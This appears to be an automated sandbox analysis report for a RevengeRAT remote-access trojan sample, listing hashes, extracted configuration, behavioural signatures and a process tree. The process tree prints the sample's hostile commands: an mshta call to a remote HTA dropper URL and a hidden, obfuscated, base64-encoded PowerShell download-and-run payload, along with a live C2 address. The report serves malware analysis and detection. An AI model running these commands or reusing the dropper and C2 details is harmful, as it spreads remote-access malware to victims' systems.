revengerat | 70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87

General

Target

70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe
Size

8.3MB
MD5

c25411c67aa30dbe53f157a411818426
SHA1

396ad9485cccba77f91a84b9d5b6356bb728d19b
SHA256

70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87
SHA512

ad36da1c23602299696e5a44d3a193ff8c29be2e73708bbbded6ae321da8de1dbdfd204279153eb19c7505a3c3f80a7334f85b261ac039c8e6153120ec096121

Score

10^/10

revengerat guest stealer trojan upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://www.minpic.de/k/b7d6/44dea/

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.minpic.de/k/b7d4/1jepll/

Extracted

Family

revengerat

Botnet

Guest

C2

185.25.50.196:64537

Mutex

RV_MUTEX-pnFwUnoWrUUgHRH

Signatures

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

RevengeRat Executable 2 IoCs

stealer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe	revengerat
C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe	revengerat

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

30 2212 mshta.exe
31 2212 mshta.exe
32 2152 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Cvnnc.exeGrffqeoehyjfp.exe

pid process

4240 Cvnnc.exe
676 Grffqeoehyjfp.exe

flow	pid	process
30	2212	mshta.exe
31	2212	mshta.exe
32	2152	powershell.exe

pid	process
4240	Cvnnc.exe
676	Grffqeoehyjfp.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe	upx
C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Grffqeoehyjfp.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Grffqeoehyjfp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	Grffqeoehyjfp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Grffqeoehyjfp.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Grffqeoehyjfp.exe

pid process

676 Grffqeoehyjfp.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeGrffqeoehyjfp.exe

pid process

2152 powershell.exe
2152 powershell.exe
676 Grffqeoehyjfp.exe
676 Grffqeoehyjfp.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Grffqeoehyjfp.exe

pid process

676 Grffqeoehyjfp.exe

pid	process
2152	powershell.exe
2152	powershell.exe
676	Grffqeoehyjfp.exe
676	Grffqeoehyjfp.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exeGrffqeoehyjfp.exe

description	pid	process
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeBackupPrivilege	676	Grffqeoehyjfp.exe
Token: SeRestorePrivilege	676	Grffqeoehyjfp.exe
Token: SeDebugPrivilege	676	Grffqeoehyjfp.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Grffqeoehyjfp.exe

pid process

676 Grffqeoehyjfp.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

Grffqeoehyjfp.exe

pid	process
676	Grffqeoehyjfp.exe
676	Grffqeoehyjfp.exe
676	Grffqeoehyjfp.exe
676	Grffqeoehyjfp.exe
676	Grffqeoehyjfp.exe
676	Grffqeoehyjfp.exe
676	Grffqeoehyjfp.exe
676	Grffqeoehyjfp.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exemshta.exeCvnnc.exe

description	pid	process	target process
PID 1292 wrote to memory of 2212	1292	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	mshta.exe
PID 1292 wrote to memory of 2212	1292	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	mshta.exe
PID 1292 wrote to memory of 2212	1292	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	mshta.exe
PID 2212 wrote to memory of 2152	2212	mshta.exe	powershell.exe
PID 2212 wrote to memory of 2152	2212	mshta.exe	powershell.exe
PID 2212 wrote to memory of 2152	2212	mshta.exe	powershell.exe
PID 1292 wrote to memory of 4240	1292	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Cvnnc.exe
PID 1292 wrote to memory of 4240	1292	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Cvnnc.exe
PID 4240 wrote to memory of 4560	4240	Cvnnc.exe	fondue.exe
PID 4240 wrote to memory of 4560	4240	Cvnnc.exe	fondue.exe
PID 1292 wrote to memory of 676	1292	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Grffqeoehyjfp.exe
PID 1292 wrote to memory of 676	1292	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Grffqeoehyjfp.exe
PID 1292 wrote to memory of 676	1292	70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe	Grffqeoehyjfp.exe

C:\Users\Admin\AppData\Local\Temp\70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe
"C:\Users\Admin\AppData\Local\Temp\70a50fac81ba4867e190e5aa600db3f849f87da0804bd670e184b665bb86ee87.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" https://www.minpic.de/k/b7d6/44dea/
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2212
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy unrestricted -windowstyle hidden -enc LgAgACAAIAAgACAAIAAoACAAIAAgACAAIAAgACAAJwBzAHYAJwAgACAAIAAgACAAIAAgACAAIAAgACAAKQAgACgAIAAgACAAIAAgACAAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGUAJwAsACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiACAALQBmACgAIAAgACAAIAAgACAAIAAgACAAJwBrAFgAJwAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACcAYQAnACAAIAAgACAAIAAgACAAIAApACwAJwAwACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAApACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAHQAeQBwAGUAXQAoACAAIAAgACAAIAAgACAAIAAgACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAE0AJwAsACgAIAAgACAAIAAgACAAIAAgACcAUABQAEQAJwAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAJwBvACcAIAAgACAAKQAgACAAIAAgACAAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAnAEEASQAnACAAIAAgACAAKwAgACAAIAAgACAAIAAgACcAbgAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkALAAnAGEAJwAgACAAIAAgACAAIAAgACAAIAApACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALgAgACAAIAAgACAAIAAgACAAIAAoACAAIAAgACAAIAAgACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAJwBlAHQALQBWAEEAcgBJAEEAJwAsACcAYgBMAGUAJwAsACcAUwAnACAAIAAgACAAIAAgACAAIAApACAAIAAoACAAIAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwA3ACcALAAnAEYAWQAnACAAIAAgACAAIAAgACAAKQAgACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAdABZAFAARQBdACgAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAtAGYAJwBUACcALAAoACAAIAAgACAAIAAgACAAIAAgACcATgAnACAAIAAgACAAKwAgACAAIAAgACAAIAAgACcAdgBlAHIAJwAgACAAIAAgACAAIAAgACAAKQAgACAAKQAsACcAQwBvACcAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgACAAIAApACAAIAAgACAAIAAgACAAIAAgACAAIAA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAZQAwAGAASwBYAGEAfQA6ADoAIgBjAGAAVQBSAGAAUgBlAG4AVABkAG8ATQBgAEEASQBOACIALgAiAEwAbwBgAEEARAAiACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAuACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAHYAQQByAGkAYQBCAGwAZQAnACwAJwBnAEUAJwAsACcAdAAtACcAIAAgACAAIAAgACAAKQAgACAAKAAgACAAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcANwAnACwAJwBmAFkAJwAgACAAIAAgACAAIAAgACAAIAAgACkAIAAgAC0AdgBBAEwAVQAgACAAIAAgACAAIAAgACkAOgA6ACgAIAAgACAAIAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMwB9AHsAMgB9AHsAMAB9ACIALQBmACgAIAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACAAIAAgACAAIAAgACcAaQAnACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAJwBuAGcAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAApACwAJwB0AHIAJwAgACAAIAAgACAAIAAgACkALAAnAEYAJwAsACgAIAAgACAAIAAgACAAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAG0AYgAnACwAKAAgACAAIAAgACAAJwBlACcAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACcANgA0AFMAJwAgACAAIAAgACAAIAAgACkALAAnAGEAcwAnACAAIAAgACAAIAAgACAAKQAsACcAcgBvACcAIAAgACAAIAAgACAAIAAgACkALgAiAEkATgBWAGAAbwBrAGUAIgAoACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJgAgACAAIAAgACAAIAAgACAAKAAgACAAIAAgACAAIAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACgAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAtAGYAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAGIAagBlACcAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJwBjACcAIAAgACAAIAAgACAAIAAgACkALAAnAHQAJwAgACAAIAAgACAAIAAgACkALAAnAE4AZQAnACwAKAAgACAAIAAgACAAIAAgACAAIAAgACcAdwAnACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAgACcALQBPACcAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAAgACkAIAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AewA0AH0AewAzAH0AewAyAH0AIgAgAC0AZgAgACgAIAAgACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAgAC0AZgAoACAAIAAgACAAIAAnAFMAJwAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAnAHkAcwAnACAAIAAgACAAIAApACwAJwB0ACcAIAAgACAAIAAgACAAIAAgACAAIAAgACkALAAoACAAIAAgACAAIAAgACAAIAAgACAAJwBlAG0AJwAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACcALgAnACAAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAgACAAIAAgACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACAAIAAgACAAIAAgACAAJwBlAG4AJwAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAJwB0ACcAIAAgACAAIAAgACAAIAAgACAAIAApACwAJwBpACcAIAAgACAAIAAgACAAIAAgACAAIAAgACkALAAoACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIAAgACAAIAAgACAAIAAgACAAIAAnAFcAJwAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACcAZQBiACcAIAAgACAAIAAgACAAKQAsACcAQwBsACcAIAAgACAAIAAgACAAIAAgACAAKQAsACgAIAAgACAAIAAgACAAIAAgACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAE4AZQAnACwAJwB0AC4AJwAgACAAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgACAAIAApACAAIAAgACAAIAAgACAAIAAgACAAKQAuACgAIAAgACAAIAAgACAAIAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAoACAAIAAgACAAIAAgACAAIAAgACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBvACcALAAnAEQAbwAnACwAKAAgACAAIAAgACAAIAAgACcAdwBuACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAGwAJwAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAgACAAIAAgACAAJwBpACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACcAbgBnACcAIAAgACAAIAApACwAKAAgACAAIAAgACAAIAAgACAAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAdAByACcALAAoACAAIAAgACAAIAAgACAAJwBhACcAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAJwBkAHMAJwAgACAAIAAgACAAKQAgACAAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAKQAuACIAaQBuAGAAVgBvAGsAZQAiACgAIAAgACAAIAAgACAAIAAgACAAIAAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBuAHAAaQBjAC4AZABlAC8AawAvAGIANwBkADQALwAxAGoAZQBwAGwAbAAvACcAIAAgACAAIAAgACAAIAAgACkAIAAgACAAIAAgACAAIAAgACAAKQAgACAAIAAgACAAIAAgACAAIAApAC4AIgBFAE4AdABgAFIAYAB5AGAAUABPAGkAbgB0ACIALgAiAEkAYABOAFYATwBLAGUAIgAoACAAIAAgACAAIAAgACQAewBOAHUAYABsAGwAfQAsACQAewBuAHUAYABsAGwAfQAgACAAIAAgACAAIAAgACkA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe
  "C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4240
- - C:\Windows\system32\fondue.exe
    "C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
    3⤵
    PID:4560
- C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe
  "C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:676

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe

MD5
72ef30dcd9957849920b70bba22ba753

SHA1
6767ec9b1a8f77a9ffb9883cffe2196b94971883

SHA256
930456009ff667ff95f11653868926de83ce4a6e133a0abf0fe8b36be58e1128

SHA512
d3c542fa72034e1edccb5d3ff8e72d5db8084783aa174b780a4636f7ace075432feeef30554db3da404a45d9ad9b829ce3f6c5beb9eff385ba394ca0d23581c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cvnnc.exe

MD5
72ef30dcd9957849920b70bba22ba753

SHA1
6767ec9b1a8f77a9ffb9883cffe2196b94971883

SHA256
930456009ff667ff95f11653868926de83ce4a6e133a0abf0fe8b36be58e1128

SHA512
d3c542fa72034e1edccb5d3ff8e72d5db8084783aa174b780a4636f7ace075432feeef30554db3da404a45d9ad9b829ce3f6c5beb9eff385ba394ca0d23581c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe

MD5
84461fc05f27723f68779c18329dfb0c

SHA1
eee78ff3d7dc01fd4091d87ee58bc08f07fa4bb1

SHA256
022b68cad3452cbafa9d735b2c1be070b10e06e38cc15800a40431f3f7954f9e

SHA512
68ed44e620469520dbbaab729a103ee2620051b7b590e30cd232bbd8feed6573ee8a4222b718d051b688dd210009118a68d277a5f9678a9f09d30adbcdc0a78a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Grffqeoehyjfp.exe

MD5
84461fc05f27723f68779c18329dfb0c

SHA1
eee78ff3d7dc01fd4091d87ee58bc08f07fa4bb1

SHA256
022b68cad3452cbafa9d735b2c1be070b10e06e38cc15800a40431f3f7954f9e

SHA512
68ed44e620469520dbbaab729a103ee2620051b7b590e30cd232bbd8feed6573ee8a4222b718d051b688dd210009118a68d277a5f9678a9f09d30adbcdc0a78a

Download Submit
memory/1292-150-0x000000000E050000-0x000000000E5F4000-memory.dmp

Filesize
5.6MB

Download
memory/1292-135-0x0000000000560000-0x0000000000DAE000-memory.dmp

Filesize
8.3MB

Download
memory/1292-136-0x0000000005790000-0x000000000582C000-memory.dmp

Filesize
624KB

Download
memory/1292-137-0x0000000006270000-0x0000000006271000-memory.dmp

Filesize
4KB

Download
memory/1292-152-0x0000000005910000-0x000000000591A000-memory.dmp

Filesize
40KB

Download
memory/1292-151-0x00000000060A0000-0x0000000006132000-memory.dmp

Filesize
584KB

Download
memory/1292-134-0x0000000074CF0000-0x00000000754A0000-memory.dmp

Filesize
7.7MB

Download
memory/2152-145-0x0000000005CC0000-0x0000000005D26000-memory.dmp

Filesize
408KB

Download
memory/2152-146-0x0000000006300000-0x000000000631E000-memory.dmp

Filesize
120KB

Download
memory/2152-147-0x0000000004FE5000-0x0000000004FE7000-memory.dmp

Filesize
8KB

Download
memory/2152-148-0x0000000007C50000-0x00000000082CA000-memory.dmp

Filesize
6.5MB

Download
memory/2152-149-0x0000000006820000-0x000000000683A000-memory.dmp

Filesize
104KB

Download
memory/2152-144-0x0000000004FE2000-0x0000000004FE3000-memory.dmp

Filesize
4KB

Download
memory/2152-142-0x0000000005C50000-0x0000000005CB6000-memory.dmp

Filesize
408KB

Download
memory/2152-143-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

Filesize
4KB

Download
memory/2152-141-0x0000000074CF0000-0x00000000754A0000-memory.dmp

Filesize
7.7MB

Download
memory/2152-140-0x0000000005470000-0x0000000005492000-memory.dmp

Filesize
136KB

Download
memory/2152-139-0x0000000005620000-0x0000000005C48000-memory.dmp

Filesize
6.2MB

Download
memory/2152-138-0x0000000002A10000-0x0000000002A46000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads